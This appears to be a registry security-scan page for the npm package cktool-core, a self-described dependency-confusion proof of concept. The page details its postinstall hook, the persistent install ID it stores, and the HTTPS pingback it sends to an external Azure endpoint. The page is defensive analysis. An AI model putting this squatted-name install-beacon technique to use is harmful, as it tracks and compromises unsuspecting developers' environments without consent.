registry  /  cktool-core  /  1.0.1

cktool-core@1.0.1

⚠️ SECURITY RESEARCH — Apple Bug Bounty dependency confusion PoC. The correct package is @apple/cktool.core.

AI Security Review

scanned 3h ago · by lpm-firewall-ai

The package performs unconsented install-time telemetry from an npm lifecycle hook. It persists a unique local ID and beacons installation metadata to an external Azure endpoint.

Static reason
One or more suspicious static signals were detected.
Trigger
npm install lifecycle postinstall
Impact
Tracks installations of a dependency-confusion package and confirms affected environments to an external service.
Mechanism
postinstall HTTPS pingback with persistent install identifier
Attack narrative
On installation, npm runs postinstall.js. The script creates or reuses a cache file containing a UUID, then posts that ID plus version, timestamp, and an npm-postinstall marker to an Azure endpoint. The package presents itself as a dependency-confusion PoC for a similarly named Apple package, so the hook confirms vulnerable installs without explicit user consent.
Rationale
Source inspection confirms a lifecycle-triggered dependency-confusion PoC with external install pingback and persistent identifier, which is concrete unconsented behavior even though it does not steal secrets. This should be blocked as dependency-confusion telemetry rather than treated as scanner noise.
Evidence
package.jsonpostinstall.jsindex.jsREADME.md$XDG_CACHE_HOME/.cktool-core-id~/.cache/.cktool-core-id
Network endpoints1
npx-monitor-76056.azurewebsites.net/api/pingback

Decision evidence

public snapshot
AI called this Malicious at 95.0% confidence as Malware with low false-positive risk.
Evidence for block
  • package.json runs postinstall: node postinstall.js
  • postinstall.js executes at install time and sends HTTPS POST to npx-monitor-76056.azurewebsites.net/api/pingback
  • postinstall.js creates/reads a persistent install ID in XDG_CACHE_HOME or ~/.cache/.cktool-core-id
  • Payload includes install ID, package version marker, npm-postinstall marker, and timestamp
  • README describes this as dependency confusion PoC for unscoped cktool-core vs @apple/cktool.core
Evidence against
  • index.js only prints warning/remediation text when imported or run
  • No credential file harvesting, shell execution, eval, native binary loading, or AI-agent control-surface writes found
  • Network payload is limited to install telemetry, not source files or secrets
Behavioral surface
Source
CryptoEnvironmentVarsFilesystemNetwork
Supply chain
UrlStrings
ManifestNo manifest risk signals triggered.
scanned 2 file(s), 2.70 KB of source, external domains: npmjs.com

Source & flagged code

2 flagged · loading source
package.jsonView file
scripts.postinstall = node postinstall.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.postinstall = node postinstall.js
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg

Findings

1 High3 Medium3 Low
HighInstall Time Lifecycle Scriptspackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumNetwork
MediumEnvironment Vars
LowScripts Present
LowFilesystem
LowUrl Strings